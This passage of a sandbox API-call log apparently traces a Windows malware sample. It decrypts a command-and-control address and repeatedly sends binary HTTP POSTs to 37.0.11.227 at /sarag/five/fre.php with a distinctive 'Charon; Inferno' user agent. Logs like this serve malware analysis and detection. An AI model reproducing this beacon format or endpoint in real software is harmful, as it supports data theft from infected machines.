Size=0x7d) returned 0x6af100 [0189.280] GetProcessHeap () returned 0x690000 [0189.280] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0189.281] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0189.282] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0189.282] GetProcessHeap () returned 0x690000 [0189.282] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0189.282] GetProcessHeap () returned 0x690000 [0189.282] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0189.283] GetProcessHeap () returned 0x690000 [0189.283] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0189.283] GetProcessHeap () returned 0x690000 [0189.283] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0189.283] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0189.286] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0189.286] GetProcessHeap () returned 0x690000 [0189.286] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0189.286] GetProcessHeap () returned 0x690000 [0189.286] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0189.286] send (s=0x370, buf=0x6abd08*, len=242, flags=0) returned 242 [0189.287] send (s=0x370, buf=0x6aba40*, len=159, flags=0) returned 159 [0189.287] GetProcessHeap () returned 0x690000 [0189.287] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0189.287] recv (in: s=0x370, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0189.363] GetProcessHeap () returned 0x690000 [0189.364] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0189.364] GetProcessHeap () returned 0x690000 [0189.364] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0189.364] GetProcessHeap () returned 0x690000 [0189.365] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0189.365] GetProcessHeap () returned 0x690000 [0189.365] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0189.365] closesocket (s=0x370) returned 0 [0189.366] GetProcessHeap () returned 0x690000 [0189.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0189.366] GetProcessHeap () returned 0x690000 [0189.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0189.367] GetProcessHeap () returned 0x690000 [0189.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0189.367] GetProcessHeap () returned 0x690000 [0189.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0189.368] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x10e4) returned 0x370 [0189.369] Sleep (dwMilliseconds=0xea60) [0189.372] GetProcessHeap () returned 0x690000 [0189.372] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0189.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.373] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0189.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.379] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0189.388] GetProcessHeap () returned 0x690000 [0189.388] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0189.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.389] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0189.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.391] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0189.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.395] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0189.395] GetProcessHeap () returned 0x690000 [0189.396] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0189.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.397] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0189.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.398] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0189.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.399] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0189.399] GetProcessHeap () returned 0x690000 [0189.399] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0189.400] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.400] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0189.401] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.401] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0189.402] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.408] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0189.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.409] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0189.409] GetProcessHeap () returned 0x690000 [0189.409] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0189.409] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0189.409] GetProcessHeap () returned 0x690000 [0189.410] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0189.410] GetProcessHeap () returned 0x690000 [0189.410] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0189.410] GetProcessHeap () returned 0x690000 [0189.410] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0189.410] GetProcessHeap () returned 0x690000 [0189.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0189.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.412] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0189.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.419] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0189.429] GetProcessHeap () returned 0x690000 [0189.429] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0189.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.430] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0189.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.431] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0189.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.432] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0189.432] GetProcessHeap () returned 0x690000 [0189.433] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0189.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.434] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0189.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.436] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0189.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.440] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0189.440] GetProcessHeap () returned 0x690000 [0189.440] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0189.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.441] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0189.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.442] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0189.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.444] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0189.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.445] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0189.445] GetProcessHeap () returned 0x690000 [0189.445] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0189.445] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6adf68*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0189.445] GetProcessHeap () returned 0x690000 [0189.445] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4a0 [0189.445] socket (af=2, type=1, protocol=6) returned 0x374 [0189.445] connect (s=0x374, name=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0189.490] FreeAddrInfoW (pAddrInfo=0x6adf68*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0189.493] GetProcessHeap () returned 0x690000 [0189.493] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0189.493] GetProcessHeap () returned 0x690000 [0189.493] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0189.494] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0189.495] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0189.495] GetProcessHeap () returned 0x690000 [0189.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0189.495] GetProcessHeap () returned 0x690000 [0189.496] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0189.497] GetProcessHeap () returned 0x690000 [0189.497] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0189.497] GetProcessHeap () returned 0x690000 [0189.497] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0189.498] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0189.499] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0189.499] GetProcessHeap () returned 0x690000 [0189.499] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0189.499] GetProcessHeap () returned 0x690000 [0189.500] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0189.500] send (s=0x374, buf=0x6abd08*, len=242, flags=0) returned 242 [0189.500] send (s=0x374, buf=0x6aba40*, len=159, flags=0) returned 159 [0189.501] GetProcessHeap () returned 0x690000 [0189.501] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0189.501] recv (in: s=0x374, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0189.579] GetProcessHeap () returned 0x690000 [0189.580] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0189.580] GetProcessHeap () returned 0x690000 [0189.581] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0189.581] GetProcessHeap () returned 0x690000 [0189.581] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0189.581] GetProcessHeap () returned 0x690000 [0189.582] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0189.582] closesocket (s=0x374) returned 0 [0189.582] GetProcessHeap () returned 0x690000 [0189.582] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4a0 | out: hHeap=0x690000) returned 1 [0189.582] GetProcessHeap () returned 0x690000 [0189.583] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0189.583] GetProcessHeap () returned 0x690000 [0189.583] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0189.583] GetProcessHeap () returned 0x690000 [0189.583] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0189.584] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x10f8) returned 0x374 [0189.586] Sleep (dwMilliseconds=0xea60) [0189.587] GetProcessHeap () returned 0x690000 [0189.587] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0189.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.589] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0189.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.597] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0189.607] GetProcessHeap () returned 0x690000 [0189.607] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0189.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.608] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0189.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.610] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0189.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.613] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0189.613] GetProcessHeap () returned 0x690000 [0189.614] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0189.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.615] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0189.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.617] CryptDestroyKey (hKey=0x69d628) returned 1 [0189.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.618] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0189.618] GetProcessHeap () returned 0x690000 [0189.618] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0189.619] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.619] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0189.623] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.624] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0189.625] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.625] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0189.626] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.626] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0189.626] GetProcessHeap () returned 0x690000 [0189.626] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0189.626] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0189.627] GetProcessHeap () returned 0x690000 [0189.627] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0189.627] GetProcessHeap () returned 0x690000 [0189.627] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0189.628] GetProcessHeap () returned 0x690000 [0189.628] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0189.628] GetProcessHeap () returned 0x690000 [0189.628] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0189.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.629] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0189.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.638] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0189.647] GetProcessHeap () returned 0x690000 [0189.647] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0189.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.649] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0189.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.650] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0189.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.651] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0189.651] GetProcessHeap () returned 0x690000 [0189.652] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0189.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.653] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0189.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.654] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0189.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0189.655] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0189.655] GetProcessHeap () returned 0x690000 [0189.655] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0189.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.656] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0189.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.658] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0189.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.659] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0189.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0189.660] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0189.660] GetProcessHeap () returned 0x690000 [0189.660] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0189.660] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6adc98*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeaa8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0189.660] GetProcessHeap () returned 0x690000 [0189.660] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0189.660] socket (af=2, type=1, protocol=6) returned 0x378 [0189.661] connect (s=0x378, name=0x6aeaa8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0189.683] FreeAddrInfoW (pAddrInfo=0x6adc98*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeaa8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0189.683] GetProcessHeap () returned 0x690000 [0189.683] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0189.683] GetProcessHeap () returned 0x690000 [0189.683] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0189.684] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0189.685] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0189.685] GetProcessHeap () returned 0x690000 [0189.685] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0189.685] GetProcessHeap () returned 0x690000 [0189.686] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0189.745] GetProcessHeap () returned 0x690000 [0189.745] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0189.745] GetProcessHeap () returned 0x690000 [0189.745] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0189.746] 